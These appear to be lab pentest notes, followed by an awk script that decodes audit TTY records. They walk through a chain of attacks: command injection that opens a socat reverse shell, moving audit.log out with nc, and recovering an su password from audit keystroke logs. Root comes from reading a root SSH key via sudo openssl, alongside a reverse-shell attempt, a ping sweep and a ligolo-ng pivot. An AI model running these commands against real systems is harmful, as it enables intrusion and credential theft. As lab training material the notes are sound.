# Shell as `webdev`

- payload: newline injection (`%0A`) into the `ip` parameter of `ping.php`, with `${IFS}` standing in for spaces; the URL is single-quoted so the local shell does not expand `${IFS}` (or treat `?` as a glob) before `curl` ever sees it

```bash
curl 'http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash'
```

- we have a hit

![[images/Pasted image 20260630222557.png]]

- stabilize shell
- we can read logs in `/var/log` because we are in the `adm` group
- move `audit.log` to Kali

```bash
which nc                                    # check for nc on target
nc -lnvp 9002 -q 3 > loot/audit.log         # set up listener on Kali
nc -q 3 -nv 10.10.15.114 9002 < audit.log   # push audit.log from target to Kali
# compare sha256sum of both copies afterwards to make sure nothing was truncated
```

- now we need a tool to parse `audit.log`

![[images/Pasted image 20260701172600.png]]

- try `audit-pretty` first, then `aushape`
- got both working and `grep` on `srvadm` and `webdev`
- I see `/usr/bin/su` being called but no creds
- try `aureport`
- install `auditd`; we could have also done this on target
- `aureport --tty` reconstructs keystrokes from the `type=TTY` records (hex-encoded `data=` field) that TTY auditing writes, which is where anything typed at the `su` password prompt ends up
- this leaks creds for `srvadm`

```bash
sudo cat audit.log | aureport --tty | grep -B5 srvadm   # aureport reads the records from stdin
```

# Shell as `srvadm`

- `su` to `srvadm`
- `flag.txt` in home dir; not much else
- DMZ01 is dual-homed

![[images/Pasted image 20260701200741.png]]

- we can run `openssl` as root

![[images/Pasted image 20260701175658.png]]

- try below from GTFObins (the GTFObins catcher for this is `openssl s_server -quiet -key key.pem -cert cert.pem -port 9002` on Kali, with a self-signed cert from `openssl req -x509 -newkey rsa:4096 -keyout key.pem -cert cert.pem -days 365 -nodes`; a plain `nc` listener will not complete the TLS handshake)

```bash
mkfifo /tmp/f
sudo /bin/sh -i </tmp/f 2>&1 | sudo openssl s_client -quiet -connect 10.10.15.114:9002 >/tmp/f
```

- that did not work; instead, read `id_rsa` (`openssl enc` with no cipher option just copies its input to stdout, and it runs as root)

```bash
sudo openssl enc -in /root/.ssh/id_rsa > id_rsa
```

![[images/Pasted image 20260701192428.png]]

- move back to Kali with the above `nc` trick

![[images/Pasted image 20260701195304.png]]

# Shell as `root`

## light enum

- networking check

![[images/Pasted image 20260701195343.png]]

- interface 4 (172.18.0.0/16) is a custom Docker bridge network and interface 5 (172.17.0.0/16) is the default Docker bridge
- `.bash_history`

![[images/Pasted image 20260701195717.png]]

- docker containers: `docker ps -a`

![[images/Pasted image 20260701195747.png]]

- login shells

## host discovery

- 172.16.8.0/24 sweep from DMZ01 (one backgrounded `ping` per host, keeping only the replies)

```bash
for i in {1..254}; do (ping -c 1 172.16.8.$i | grep "bytes from" &); done
```

![[images/Pasted image 20260701201424.png]]

## setup pivot

- steps on Kali

```bash
sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up   # tun interface for ligolo-ng
sudo ip route add 172.16.8.0/24 dev ligolo; ip route | grep ligolo               # route the internal subnet through it
sudo ./proxy -laddr 0.0.0.0:11601 -selfcert                                      # ligolo-ng proxy with a self-signed cert
scp -i ../loot/dmz01.id_rsa agent root@<DMZ01 IP>:/root                          # move ligolo agent to DMZ01 with the stolen root key
```

- steps on DMZ01

```bash
./agent -connect 10.10.15.114:11601 -ignore-cert   # -ignore-cert because the proxy is self-signed
```

- steps in ligolo

```bash
ligolo > session             # select session 1
ligolo > start --tun ligolo
```

- confirm interface and routes

![[images/Pasted image 20260701202408.png]]

- confirm with ping

![[images/Pasted image 20260701202428.png]]
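As an added example (not part of these notes, and not auditd's own code), here is what the `aureport --tty` step in the `webdev` section is doing when it surfaces the `srvadm` credentials: TTY auditing writes `type=TTY` records whose `data=` field holds the raw keystrokes, stored verbatim in quotes when printable and hex-encoded when they contain anything else (such as the Enter key). The script decodes those records with plain `awk`, so it works on a stripped-down target or on a copied log. The audit records, PIDs, UIDs and the password `S3cr3t!` are constructed sample data, not taken from the lab.

```shell
#!/bin/sh
# Decode TTY keystroke records from a Linux audit log (added example, not from the notes).
# Constructed sample records (NOT from the target): an EXECVE for su, a TTY record with
# printable quoted data, a TTY record with hex-encoded data, and an unrelated SYSCALL.
AUDIT_SAMPLE='type=EXECVE msg=audit(1625166001.111:2001): argc=2 a0="su" a1="srvadm"
type=TTY msg=audit(1625166001.112:2002): tty pid=4242 uid=1001 auid=1001 ses=3 major=136 minor=1 comm="bash" data="su srvadm"
type=TTY msg=audit(1625166005.500:2003): tty pid=4243 uid=1001 auid=1001 ses=3 major=136 minor=1 comm="su" data=533363723374210A
type=SYSCALL msg=audit(1625166006.000:2004): arch=c000003e syscall=59 success=yes exit=0 comm="su" exe="/usr/bin/su"'

# Read audit records on stdin and print one line per TTY record:
#   serial=<n> uid=<u> comm=<program> keys=<decoded keystrokes>
# A newline byte is rendered as <nl> and a carriage return as <ret>, like aureport does.
decode_tty_records() {
  awk '
  function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
  function hex2str(h,    i, b, s) {
    s = ""
    for (i = 1; i <= length(h); i += 2) {
      b = hexval(substr(h, i, 1)) * 16 + hexval(substr(h, i + 1, 1))
      if (b == 10)      s = s "<nl>"
      else if (b == 13) s = s "<ret>"
      else              s = s sprintf("%c", b)
    }
    return s
  }
  $1 == "type=TTY" {
    # msg=audit(<epoch>:<serial>): -> keep only the serial number
    serial = $2; sub(/\):$/, "", serial); sub(/.*:/, "", serial)
    uid = ""; comm = ""
    for (i = 3; i <= NF; i++) {
      if ($i ~ /^uid=/)  uid = substr($i, 5)
      if ($i ~ /^comm=/) { comm = substr($i, 6); gsub(/"/, "", comm) }
    }
    data = $0; sub(/.* data=/, "", data)            # data= is the last field of a TTY record
    if (data ~ /^"/) { gsub(/^"|"$/, "", data); keys = data }   # printable input is quoted as-is
    else             keys = hex2str(data)                        # anything else is hex-encoded
    printf "serial=%s uid=%s comm=%s keys=%s\n", serial, uid, comm, keys
  }'
}

# Keystrokes that went to a given program, e.g. everything typed while su owned the tty.
tty_keys_for_comm() {
  printf '%s\n' "$AUDIT_SAMPLE" | decode_tty_records |
    awk -v c="$1" '$3 == "comm=" c { sub(/^.*keys=/, ""); print }'
}

# Usage on a real copy: decode_tty_records < loot/audit.log | grep 'comm=su '
tty_keys_for_comm su     # S3cr3t!<nl>  (the password typed at the su prompt)
```

The record with `comm="su"` is the one that matters: the shell's own record only shows `su srvadm`, but whatever was typed while `su` was reading the password lands in a separate TTY record attributed to `su`, which is exactly what the `grep -B5 srvadm` on the `aureport --tty` output surfaced.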